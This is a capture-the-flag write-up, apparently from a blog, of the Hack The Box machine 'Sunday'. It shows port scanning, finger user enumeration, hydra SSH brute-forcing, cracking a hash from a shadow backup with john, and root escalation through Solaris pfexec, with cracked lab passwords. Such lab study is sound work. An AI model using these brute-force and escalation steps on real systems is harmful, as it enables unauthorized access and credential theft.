HTB: Sunday


This machine is Sunday from Hack The Box


I started a nmap scan but it was taking far too long so I setup a masscan

root@kali:~# masscan -p0-65335,U:0-65335 --rate=1000 -i tun0
Discovered open port 35642/tcp on
Discovered open port 54116/tcp on
Discovered open port 22022/tcp on
Discovered open port 111/tcp on
Discovered open port 79/tcp on 

Then I nmaped the open ports only

root@kali:~# nmap -sV -p35642,54116,22022,111,79 -T4
Starting Nmap 7.70 ( ) at 2019-07-13 12:00 EDT
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 12:01 (0:00:15 remaining)
Nmap scan report for
Host is up (0.031s latency).

79/tcp    open  finger    Sun Solaris fingerd
111/tcp   open  rpcbind   2-4 (RPC #100000)
22022/tcp open  ssh       SunSSH 1.3 (protocol 2.0)
35642/tcp open  smserverd 1 (RPC #100155)
54116/tcp open  unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 68.00 seconds


I used finger enum from

root@kali:~# ./ -U /usr/share/wordlists/rockyou.txt -t
Starting finger-user-enum v1.0 ( )

|                   Scan Information                       |

Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/rockyou.txt
Target count ............. 1
Username count ........... 14344392
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Sat Jul 13 12:16:27 2019 #########
[email protected]: sammy                 pts/2        <Apr 24, 2018>
[email protected]: sunny                 pts/3        <Apr 24, 2018>

I had 2 potential usernames, so I saved them as users.txt and pointed hydra at the ssh

root@kali:~# hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -s 22022 ssh
[22022][ssh] host:   login: sunny   password: sunday

Tried to login with the creds

root@kali:~# ssh [email protected] -p 22022
Unable to negotiate with port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

Weird, so I specified a valid key exchange

root@kali:~#  ssh [email protected] -p 22022 -o KeXAlgorithms=diffie-hellman-group1-sha1

There we go

sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
    (root) NOPASSWD: /root/troll

I tested it

sunny@sunday:~$ sudo /root/troll
uid=0(root) gid=0(root)

It seemed to actually be a troll, so I carried on my enum, eventually finding /backup

sunny@sunday:~$ cd /backup
sunny@sunday:/backup$ ls -la
drwxr-xr-x  2 root root   4 2018-04-15 20:44 .
drwxr-xr-x 26 root root  27 2018-04-24 12:57 ..
-r-x--x--x  1 root root  53 2018-04-24 10:35 agent22.backup
-rw-r--r--  1 root root 319 2018-04-15 20:44 shadow.backup

sunny@sunday:/backup$ cat shadow.backup

I saved sammys hash as crack.txt and set john on it

root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude!        (sammy)
1g 0:00:00:27 DONE (2019-07-13 13:36) 0.03591g/s 7356p/s 7356c/s 7356C/s domonique1..bluenote
Use the "--show" option to display all of the cracked passwords reliably
Session completed

I then su'd

sunny@sunday:/backup$ su sammy
User sammy may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/wget

I can run wget as root, so I could use this to write as root and grant myself extra privs, but as it's a solaris machine, I checked the profiles too

sunny@sunday:/backup$ profiles -l

      Primary Administrator:
          *    uid=0, gid=0
      Basic Solaris User:
          /usr/bin/readcd.bin    privs=file_dac_read,sys_devices,net_privaddr
          /usr/lib/fs/smbfs/mount    privs=sys_mount
          /usr/lib/fs/smbfs/umount    privs=sys_mount

This means I can run pfexec as root

sunny@sunday:/backup$ pfexec bash

sunny@sunday:/backup# id
uid=0(root) gid=0(root) groups=10(staff)

Then find my flags

sunny@sunday:~# find / -name user.txt 2>/dev/null

sunny@sunday:~# cat /export/home/sammy/Desktop/user.txt
sunny@sunday:~# cd /root
sunny@sunday:/root# ls -la
drwx------  6 root root   13 2018-04-24 10:31 .
drwxr-xr-x 26 root root   27 2018-04-24 12:57 ..
-rw-r--r--  1 root root  280 2009-05-14 21:18 .bashrc
drwx------  3 root root    3 2018-04-15 20:22 .config
drwx------  3 root root    3 2018-04-24 09:30 .gconf
drwx------  2 root root    3 2018-04-15 20:23 .gconfd
-rwx------  1 root root  112 2018-04-24 10:48 overwrite
-rw-r--r--  1 root root  611 2009-05-14 21:18 .profile
-rw-------  1 root root 1365 2018-04-15 20:23 .recently-used.xbel
-r--------  1 root root   33 2018-04-15 20:38 root.txt
drwx------  3 root root    3 2018-04-15 20:30 .sunw
-r-x--x--x  1 root root   53 2019-07-13 17:42 troll
-rw-------  1 root root   53 2018-04-24 10:35 troll.original

sunny@sunday:/root# cat root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.